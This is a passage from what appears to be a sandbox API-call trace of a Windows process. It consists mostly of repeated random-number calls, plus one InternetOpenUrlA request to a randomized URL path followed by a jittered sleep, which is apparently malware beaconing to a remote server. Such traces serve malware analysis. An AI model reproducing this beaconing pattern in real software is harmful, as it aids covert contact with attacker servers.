(hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.274] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.274] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.274] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.274] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.274] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.275] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.275] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.275] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.275] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.275] GetProcessHeap () returned 0x440000 [0185.275] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x4726f0 [0185.275] lstrcpyA (in: lpString1=0x4726f0, lpString2="P$ \x03" | out: lpString1="P$ \x03") returned="P$ \x03" [0185.275] lstrcatA (in: lpString1="P$ \x03", lpString2="/CbWawyall2pq86bg4m7A4xP8ojoo4kbAxmvgthgeL2/6oepR20c8l122rx0fpfeVjlwVkBmSxIff0icHa1sr/5x23vIjdorsDcdrs/qx21xh7G0a0kvcleJkvh7329/5f4fosDoahham5BikwSkehJ/" | out: lpString1="P$ \x03/CbWawyall2pq86bg4m7A4xP8ojoo4kbAxmvgthgeL2/6oepR20c8l122rx0fpfeVjlwVkBmSxIff0icHa1sr/5x23vIjdorsDcdrs/qx21xh7G0a0kvcleJkvh7329/5f4fosDoahham5BikwSkehJ/") returned="P$ \x03/CbWawyall2pq86bg4m7A4xP8ojoo4kbAxmvgthgeL2/6oepR20c8l122rx0fpfeVjlwVkBmSxIff0icHa1sr/5x23vIjdorsDcdrs/qx21xh7G0a0kvcleJkvh7329/5f4fosDoahham5BikwSkehJ/" [0185.275] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0185.276] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="P$ \x03/CbWawyall2pq86bg4m7A4xP8ojoo4kbAxmvgthgeL2/6oepR20c8l122rx0fpfeVjlwVkBmSxIff0icHa1sr/5x23vIjdorsDcdrs/qx21xh7G0a0kvcleJkvh7329/5f4fosDoahham5BikwSkehJ/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0185.276] GetProcessHeap () returned 0x440000 [0185.276] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4726f0 | out: hHeap=0x440000) returned 1 [0185.276] GetProcessHeap () returned 0x440000 [0185.276] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a02450 | out: hHeap=0x440000) returned 1 [0185.276] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0185.276] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0185.276] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.277] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0185.277] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0185.277] Sleep (dwMilliseconds=0x19c4c) [0185.583] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.583] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0185.583] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.584] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0185.584] GetProcessHeap () returned 0x440000 [0185.584] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xf7) returned 0x3a01850 [0185.584] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.584] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0185.584] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.584] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a01851, cbBuffer=0x27, dwFlags=0x2 | out: pbBuffer=0x3a01851) returned 0x0 [0185.585] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.585] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0185.585] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.585] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.586] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.586] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.586] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.586] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.586] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.587] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.587] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.587] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0185.587] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.587] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.587] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.588] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0185.588] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.588] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.588] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.588] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.588] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.588] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.589] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.589] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0185.589] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.589] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.589] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.589] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.589] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.589] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0185.589] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.589] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.590] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.590] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.590] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.590] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0185.591] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.591] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.591] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.591] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.591] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.591] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.592] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.592] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.592] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.592] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.592] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.593] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0185.593] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.593] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a01878, cbBuffer=0x14, dwFlags=0x2 | out: pbBuffer=0x3a01878) returned 0x0 [0185.593] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.593] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0185.594] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.594] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.594] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.594] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.594] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.594] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0185.595] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.595] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0185.595] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.595] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.595] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.595] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.596] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.596] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.596] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.596] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0185.597] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.597] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.597] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.597] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.597] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.597] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.597] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.598] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.598] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.598] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.598] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.598] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0185.598] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.599] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a0188c, cbBuffer=0x2d, dwFlags=0x2 | out: pbBuffer=0x3a0188c) returned 0x0 [0185.599] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.599] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.599] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.599] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.600] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.600] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0185.600] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.600] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.600] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.600] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.601] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.601] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.601] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.826] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0185.826] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.826] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0185.827] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.827] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.827] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.827] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.828] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.828] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.828] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.828] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.829] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.829] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0185.829] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.829] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.829] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.829] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.830] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.830] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0185.830] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.830] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.830] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.830] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.831] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.831] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.831] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.831] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.831] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.831] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.831] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.832] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0185.832] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.832] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.832] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.832] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.833] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.833] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.833] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.833] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0185.833] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.834] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0185.834] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.834] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.834] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.834] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.835] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.835] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.835] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.835] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0185.836] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.836] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.836] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.836] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.836] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.837] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0185.837] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.837] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0185.837] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0185.837] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a018b9, cbBuffer=0x1a, dwFlags=0x2 | out: pbBuffer=0x3a018b9) returned 0x0 [0185.838] GetProcAddress 